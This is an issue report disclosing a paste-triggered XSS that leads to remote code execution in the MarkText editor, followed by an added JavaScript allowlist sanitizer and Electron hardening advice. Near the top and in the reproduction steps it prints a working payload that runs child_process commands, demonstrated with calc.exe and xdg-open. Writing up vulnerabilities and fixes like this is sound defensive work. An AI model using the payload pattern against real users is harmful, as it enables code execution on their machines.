Closed
Description
An attacker can induce Mark Text users to copy and paste the HTML code below, which results in remote code execution via XSS.
```html
<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>
```

The above code is inserted into Mark Text as DOM through the source code below, and remote code execution is performed by calling `child_process` from the inline event handler.
marktext/src/muya/lib/contentState/pasteCtrl.js, lines 44 to 65 in b029938
- Can you reproduce the issue?
Steps to reproduce
- Copy the vulnerable HTML code:

```html
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
```

- Paste it into the Mark Text app
Expected behavior:
HTML should be sanitized before it is pasted into the DOM.
Actual behavior:
There is no HTML sanitization step; the paste handler only checks whether the content is wrapped in a `<table>` element.
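As an illustration of the missing step, here is an allowlist-based sanitizer that could run on pasted HTML before it reaches the DOM. This is an added example, not MarkText's own code; the tag and attribute allowlists, the `SAFE_URL` rule and the function names are assumptions chosen for the demonstration. It keeps table structure but drops every attribute that is not explicitly allowed, so `onerror` and every other `on*` handler never survives, and it removes `script`/`style` bodies and comments entirely.

```javascript
// Added example (not MarkText code): allowlist HTML sanitizer for pasted content.
// Unknown tags are unwrapped, comments and script/style elements are removed,
// and only allowlisted attributes with safe URL values are kept.

const ALLOWED_TAGS = new Set([
  'table', 'thead', 'tbody', 'tr', 'td', 'th', 'p', 'br', 'ul', 'ol', 'li',
  'b', 'i', 'em', 'strong', 'code', 'pre', 'a', 'img',
]);
// Per-tag attribute allowlist (assumed); on* handlers and style are never listed.
const ALLOWED_ATTRS = {
  a: new Set(['href', 'title']),
  img: new Set(['src', 'alt', 'title']),
};
const URL_ATTRS = new Set(['href', 'src']);
// href/src must be http(s), mailto, a relative path, or a fragment; anything
// else (javascript:, data:, entity-encoded schemes, empty values) is dropped.
const SAFE_URL = /^(?:https?:\/\/|mailto:|\.{0,2}\/|#|[A-Za-z0-9_.\-][A-Za-z0-9_.\-\/]*$)/i;

const COMMENT_RE = /^<!--[\s\S]*?-->/;
const TAG_RE = /^<(\/?)([A-Za-z][A-Za-z0-9-]*)((?:\s+[^\s"'<>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'<>`]+))?)*)\s*(\/?)>/;
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>`]+)))?/g;

// Escape text and attribute values; existing entities are left as they are.
function escapeText(s) {
  return s
    .replace(/&(?![a-zA-Z][a-zA-Z0-9]*;|#\d+;|#x[0-9a-fA-F]+;)/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Rebuild the attribute string from the allowlist only.
function sanitizeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return '';
  let out = '';
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (!allowed.has(name)) continue;                       // drops onerror etc.
    if (URL_ATTRS.has(name) && !SAFE_URL.test(value.trim())) continue;
    out += ` ${name}="${escapeText(value)}"`;
  }
  return out;
}

function sanitizeHtml(html) {
  let out = '';
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) { out += escapeText(html.slice(i)); break; }
    out += escapeText(html.slice(i, lt));
    const rest = html.slice(lt);
    const c = COMMENT_RE.exec(rest);
    if (c) { i = lt + c[0].length; continue; }              // comment removed
    const m = TAG_RE.exec(rest);
    if (!m) { out += '&lt;'; i = lt + 1; continue; }        // stray '<' becomes text
    const [whole, close, rawName, rawAttrs, selfClose] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (name === 'script' || name === 'style') {
      if (!close) {                                         // skip the whole body
        const endRe = new RegExp('</' + name + '\\s*>', 'i');
        const endIdx = html.slice(i).search(endRe);
        if (endIdx === -1) break;
        i += endIdx;
        i += endRe.exec(html.slice(i))[0].length;
      }
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;                  // unwrap unknown tag
    if (close) { out += `</${name}>`; continue; }
    out += `<${name}${sanitizeAttrs(name, rawAttrs)}${selfClose ? ' /' : ''}>`;
  }
  return out;
}

// Constructed sample: the payload from this report, run through the sanitizer.
const PAYLOAD = '<table><tr><img src onerror="require(\'child_process\').exec(\'calc.exe\')"></tr></table>';
console.log(sanitizeHtml(PAYLOAD)); // <table><tr><img></tr></table>
```

The design point is that the allowlist decides what survives, rather than a denylist trying to enumerate dangerous attributes. In a production Electron app this would be paired with `nodeIntegration` disabled and `contextIsolation` enabled so that an XSS in the renderer cannot reach `require('child_process')` in the first place.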
Link to an example: [optional]
bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4
Versions
- MarkText version: v0.16.3
- Operating system: Windows 11 Version 21H2 (OS Build 22000.469); Kali GNU/Linux Rolling 2021.4